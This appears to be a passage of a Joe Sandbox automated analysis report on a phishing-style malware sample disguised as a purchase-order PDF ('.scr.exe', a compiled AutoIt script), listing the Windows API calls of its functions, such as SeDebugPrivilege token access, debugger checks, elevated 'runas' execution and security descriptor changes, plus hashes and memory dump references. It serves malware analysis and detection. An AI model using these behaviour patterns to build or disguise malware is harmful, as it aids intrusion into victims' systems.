                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00434DB0
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00434DC5
                                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00434E27
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00434E3C
                                                                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00434E6F
                                                                                                                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                                                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                                            • API String ID: 302090198-3457252023
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                                                                                                                                                                                                            • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                                                                                                                                                                                                                                                                            Function 00464422 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193threadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004644B4
                                                                                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                                                                                                                                                                                                                                                            • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                                            • API String ID: 1312810259-2896544425
                                                                                                                                                                                                                                                                                                            • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                                                                                                                                                                                                            • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                                                                                                                                                                                                                                                            Function 0040D6D0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,00000004), ref: 0040D7D6
                                                                                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,00000004), ref: 00431B0E
                                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,00000004), ref: 00431B3F
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                                                                                                                                                                                                                                                            • String ID: @GH$@GH$C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                                                                                                                                                                            • API String ID: 2493088469-2693217653
                                                                                                                                                                                                                                                                                                            • Opcode ID: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                                                                                                                                                                                                                                                                                            • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
                                                                                                                                                                                                                                                                                                            Function 004037E0 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 359COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 004038B2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 004038C7
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 004038DC
                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 004039C2
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00403A53
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00403AAA
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            • Error opening the file, xrefs: 0042B8AC
                                                                                                                                                                                                                                                                                                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                                                                                                                                                                                                                                                            • Unterminated string, xrefs: 0042B9BA
                                                                                                                                                                                                                                                                                                            • _, xrefs: 00403B48
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                                                                                                                                                                                            • API String ID: 4115725249-188983378
                                                                                                                                                                                                                                                                                                            • Opcode ID: d7288fac851473b4c68864adb1f3b5325d4110cb2bcb5135c60f69256c1ab32c
                                                                                                                                                                                                                                                                                                            • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7288fac851473b4c68864adb1f3b5325d4110cb2bcb5135c60f69256c1ab32c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                                                                                                                                                                                                                                                            Function 00434BEE Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                                            • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                                            • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                                                                                                                                                                                                            • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                                                                                                                                                                                                                                                            Function 00444078 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94timesleepCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Timetime$Sleep
                                                                                                                                                                                                                                                                                                            • String ID: BUTTON
                                                                                                                                                                                                                                                                                                            • API String ID: 4176159691-3405671355
                                                                                                                                                                                                                                                                                                            • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                                                                                                                                                                                                            • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                                                                                                                                                                                                                                                            Function 00445DD3 Relevance: 18.2, APIs: 12, Instructions: 179COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00445E61
                                                                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
